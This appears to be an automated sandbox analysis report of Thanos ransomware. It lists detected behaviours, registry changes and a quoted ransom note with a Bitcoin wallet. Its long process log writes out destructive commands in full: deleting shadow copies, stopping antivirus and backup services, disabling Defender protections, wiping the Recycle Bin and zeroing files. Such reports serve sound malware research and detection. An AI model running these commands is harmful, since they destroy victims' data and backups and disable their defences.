Analysis Overview
Threat Level: Known bad
The file https://github.com/kh4sh3i/Ransomware-Samples was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Disables service(s)
Thanos family
Contains code to disable Windows Defender
Thanos Ransomware
Thanos executable
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
Downloads MZ/PE file
Windows security modification
Drops startup file
Checks computer location settings
Executes dropped EXE
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Launches sc.exe
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Enumerates system info in registry
Modifies registry class
Runs ping.exe
System policy modification
Modifies data under HKEY_USERS
Kills process with taskkill
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 13:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 13:45
Reported
2024-11-17 13:52
Platform
win10v2004-20241007-en
Max time kernel
349s
Max time network
313s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Thanos Ransomware
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fsutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763247747343655" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/kh4sh3i/Ransomware-Samples
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa1fc0cc40,0x7ffa1fc0cc4c,0x7ffa1fc0cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3636,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3760 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ransomware.Thanos\" -spe -an -ai#7zMap12898:96:7zEvent11329
C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe
"C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE
"C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
